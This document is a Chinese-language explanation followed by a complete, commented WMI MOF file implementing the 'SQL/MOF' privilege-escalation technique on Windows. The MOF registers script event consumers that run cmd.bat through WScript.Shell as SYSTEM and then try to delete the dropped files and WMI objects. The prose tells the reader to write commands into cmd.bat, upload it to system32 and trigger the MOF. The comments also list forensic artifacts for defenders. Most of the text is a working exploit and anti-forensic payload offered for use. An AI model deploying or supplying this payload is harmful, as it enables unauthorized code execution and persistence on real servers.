这个 SQL 提权 MOF 以相对文件名调用 `cmd.bat`（脚本中的其他相对路径，如 `wbem\mof\good\hBsBa.mof`，同样是相对于 %SystemRoot%\system32 解析的），因此无法在这个 MOF 里为要执行的文件指定路径。
需要先把要运行的命令写入 cmd.bat，上传到 system32 目录，再触发 MOF 执行。注意：MOF 内的自删除逻辑写死了文件名 hBsBa.mof，上传时若使用其他文件名，MOF 文件本身不会被清理。防守方排查时可在 root\cimv2 命名空间中查找名为 ASEC / qndASEC 的 ActiveScriptEventConsumer 实例以及名为 instfilt / qndfilt 的 __EventFilter 实例。
// WMI event-subscription payload used by the "SQL / MOF" privilege-escalation
// technique described above. Everything is compiled into root\cimv2.
//
// Flow (as visible in this file):
//   1. A throwaway class MyClass547 is declared; creating an instance of it
//      (last statement) raises an __InstanceCreationEvent.
//   2. Filter "instfilt" matches that event and, via binding $bind, fires
//      consumer "ASEC", whose JScript runs "cmd.bat" through WScript.Shell
//      and then deletes the class, the filter and itself.
//   3. A second filter/consumer pair ("qndfilt" / "qndASEC") is meant to
//      delete the dropped files once the spawned process exits (see caveat
//      on the filter below).
//
// All file names are relative: "cmd.bat" and "wbem\mof\good\hBsBa.mof" are
// resolved against the working directory of the process running the script,
// which the accompanying text assumes is %SystemRoot%\system32. The MOF
// file name "hBsBa.mof" is hard-coded in the self-delete step.
//
// Defenders: the persistent artifacts to look for in root\cimv2 are the
// __EventFilter instances "instfilt"/"qndfilt", the ActiveScriptEventConsumer
// instances "ASEC"/"qndASEC", their __FilterToConsumerBinding instances, and
// the __Win32Provider / __EventConsumerProviderRegistration entries declared
// here, which no part of this file ever removes.
#pragma namespace("\\\\.\\root\\cimv2")

// Trigger class only. It carries no data; its sole purpose is that creating
// an instance of it (at the end of this file) matches filter "instfilt".
class MyClass547
{
    [key] string Name;
};

// Local declaration of the ActiveScriptEventConsumer class in root\cimv2.
// The script consumer is normally only registered in root\subscription, so
// the class, its provider ($P) and the provider registration are declared
// here so that bindings in this namespace can use it.
class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
    uint32 KillTimeout;
};

// Provider backing the consumer class above; the CLSID is the stock
// ActiveScriptEventConsumer provider's CLSID.
instance of __Win32Provider as $P
{
    Name = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

// Registers $P as the provider for ActiveScriptEventConsumer in this
// namespace. Note: neither this registration nor $P is deleted by any of
// the cleanup scripts below.
instance of __EventConsumerProviderRegistration
{
    Provider = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

// Primary consumer. Runs "cmd.bat" (relative name, no wait flag, so Run
// returns immediately by default) and then deletes, in order, the
// MyClass547 class, the "instfilt" filter and this consumer. Every step is
// wrapped in try/catch so failures are silent. The binding $bind, the
// provider and the provider registration are left in place.
Instance of ActiveScriptEventConsumer as $cons
{
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

// Anti-forensic consumer. Deletes the compiled MOF (hard-coded relative path
// "wbem\mof\good\hBsBa.mof" -- the "good" subfolder is where successfully
// compiled MOF files end up) and "cmd.bat", then removes the "qndfilt"
// filter and itself. Deleting cmd.bat and the WMI objects sits in one
// try block, so if cmd.bat is missing the WMI objects are not removed.
Instance of ActiveScriptEventConsumer as $cons2
{
    Name = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Fires when any instance of MyClass547 is created (the trigger at the end
// of this file).
instance of __EventFilter as $Filt
{
    Name = "instfilt";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
    QueryLanguage = "WQL";
};

// Intended to fire when the spawned process exits. Caveat: Win32_Process.Name
// is the executable image name (a batch file launched via WScript.Shell runs
// under cmd.exe), so a process literally named "cmd.bat" is unlikely to exist
// and this filter probably never matches -- meaning hBsBa.mof, cmd.bat and
// the qndfilt/qndASEC/$bind2 objects likely stay behind. TODO confirm on a
// target; until then treat those as expected on-disk/WMI artifacts.
instance of __EventFilter as $Filt2
{
    Name = "qndfilt";
    Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";
    QueryLanguage = "WQL";
};

// instfilt -> ASEC
instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter = $Filt;
};

// qndfilt -> qndASEC
instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter = $Filt2;
};

// The trigger: compiling this instance raises the __InstanceCreationEvent
// that "instfilt" is waiting for, which starts the chain above.
instance of MyClass547 as $MyClass
{
    Name = "ClassConsumer";
};